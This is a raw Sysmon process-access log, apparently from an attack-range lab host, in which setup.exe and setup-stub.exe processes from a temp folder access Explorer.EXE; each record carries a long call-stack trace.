13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000014970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000014969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000014968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000014967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000014964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
